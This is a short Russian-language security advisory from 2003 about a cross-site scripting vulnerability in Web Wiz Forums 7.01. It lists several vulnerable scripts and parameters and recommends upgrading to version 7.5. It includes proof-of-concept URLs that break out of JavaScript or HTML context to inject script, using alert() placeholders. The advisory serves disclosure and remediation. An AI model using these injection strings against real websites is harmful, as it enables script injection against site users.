Security Lab

Межсайтовый скриптинг в Web Wiz Forums

Дата публикации:22.10.2003
Всего просмотров:1731
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Web Wiz Forums ver. 7.01

Описание: Уязвимость обнаружена в Web Wiz Forums. Удаленный пользователь может выполнить XSS нападение.

Уязвимость обнаружена в нескольких параметрах в сценариях forum_members.asp, members.asp, pm_buddy_list.asp и search.asp.

Пример/Эксплоит:

http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22

Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22

Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1

URL производителя:http://www.webwizforums.com

Решение: Установите обновленную версию форума (7.5): http://www.webwizforums.com

Ссылки: Web Wiz Forums ver. 7.01